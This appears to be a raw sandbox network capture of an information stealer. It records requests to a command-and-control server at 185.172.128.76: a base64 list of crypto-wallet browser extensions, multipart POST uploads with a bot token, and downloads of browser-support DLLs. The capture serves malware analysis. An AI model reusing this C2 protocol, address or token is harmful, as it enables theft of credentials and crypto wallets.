Apr 25, 2024 09:04:02.619940996 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 25, 2024 09:04:02.619951963 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 25, 2024 09:04:02.620038033 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 25, 2024 09:04:02.620050907 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 25, 2024 09:04:02.757330894 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE Host: 185.172.128.76 Content-Length: 6183 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:02.757380009 CEST	6183	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 25, 2024 09:04:03.104887009 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:03.514728069 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:03.831964016 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:03 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 25, 2024 09:04:03.831984043 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 25, 2024 09:04:03.832016945 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 25, 2024 09:04:03.832024097 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 25, 2024 09:04:03.832057953 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 25, 2024 09:04:05.640358925 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:05.980470896 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:06.070965052 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:06.412611961 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:06.431207895 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file"------DAKEBAKFHCFHIEBFBAFB--
Apr 25, 2024 09:04:06.774545908 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:07.069798946 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file"------KJDGDBFBGIDGIEBGHCGI--
Apr 25, 2024 09:04:07.410007954 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:09.934329033 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:10.248081923 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:10 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 25, 2024 09:04:11.367708921 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:11.682141066 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:11 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 25, 2024 09:04:12.217967033 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:12.537194967 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:12 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 